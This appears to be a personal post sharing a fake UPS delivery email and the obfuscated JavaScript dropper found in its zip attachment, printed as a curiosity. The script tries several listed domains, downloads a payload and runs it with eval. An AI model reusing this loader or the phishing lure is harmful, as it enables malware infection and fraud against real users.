I got this email msg today (and, it's not the first time Bob has told me about my package problems!):
That attachment is a zip file supposedly containing a defective label I am supposed to inspect and verify.
Buried in it is a nice little javascript program. Should do wonders for your box, if you want to run it!
Actually, I thought you might be curious as to what a javascript virus looks like! Can you parse the "pol.open" statement and learn which site the hacker is pulling the virus stuff from?
IF you look carefully you can probably detect the Russian influence!
Dear Grey,
We can not deliver your parcel arrived at April 09.
Please review delivery label in attachment!
Bob Archer,
UPS Parcels Delivery Manager.
We can not deliver your parcel arrived at April 09.
Please review delivery label in attachment!
Bob Archer,
UPS Parcels Delivery Manager.
Buried in it is a nice little javascript program. Should do wonders for your box, if you want to run it!
Actually, I thought you might be curious as to what a javascript virus looks like! Can you parse the "pol.open" statement and learn which site the hacker is pulling the virus stuff from?
var pol = WScript.CreateObject("MSXML2.XMLHTTP"); var jamie = ['/','t',"",":",'p','h','S','a',"T",'']; jamie[1+1] = "GETA"; jamie[2] = jamie[2].substr(0, 3); var zaher = "httpR"; zaher = zaher.substr(0, 4); var x = ["dev.alaw.net","3outs.com","oieosterkamp.com","musica.urbandrulabs.com","austinshortterm.com"]; var m = "0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0"; var gyt = 0; var lub = "/"; while(true) { if(gyt>=x.length) { break; } try { var ghyt = false; var tjkh = x[gyt+0]; pol.open(jamie[1+1], zaher + "" + jamie[3] + lub + "" + lub + tjkh + '/counter' + '?'+m, ghyt); pol.send(); var r = pol.responseText; var rima = 500; var got = 50+450+rima; if ((r.length - got) > (6-6) && r.indexOf(m) > (got+1-1002)) { var amel = muhter(r, m); var jimmk = amel.join(jamie[7]+""); if (1 == 1) { ataaa(jamie[9] + jimmk + jamie[9]); } break; }; } catch(e) { }; gyt++; }; function ataaa(ziyter) {eval(ziyter);} function muhter(kjg, lki) {return kjg.split(lki);}
IF you look carefully you can probably detect the Russian influence!